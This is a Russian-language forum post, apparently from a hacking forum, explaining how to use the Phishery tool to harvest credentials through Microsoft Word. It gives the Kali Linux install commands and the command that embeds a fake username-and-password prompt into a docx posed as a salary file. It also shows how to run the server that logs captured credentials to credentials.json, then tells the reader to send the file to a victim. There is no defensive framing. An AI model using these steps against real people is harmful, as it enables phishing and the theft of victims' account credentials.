Как получить учетные данные пользователя через Microsoft Word

OldRasta

Интересующийся
Интересующийся
OldRasta

OldRasta

Интересующийся
Интересующийся
Сообщения
62
Реакции
134
Как получить учетные данные пользователя через Microsoft Word

Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.

Установка в Kali Linux:
$ apt-get install phishery
$ mkdir phishery
$ tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery

Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.

После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
./phishery -u -i zarplata.docx -o zarplata_phish.docx

Запускаем сервер, для получения и сохранения аутентификационных данных:
$ ./phishery -s settings.json -c credentials.json

Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
 

Сверху Снизу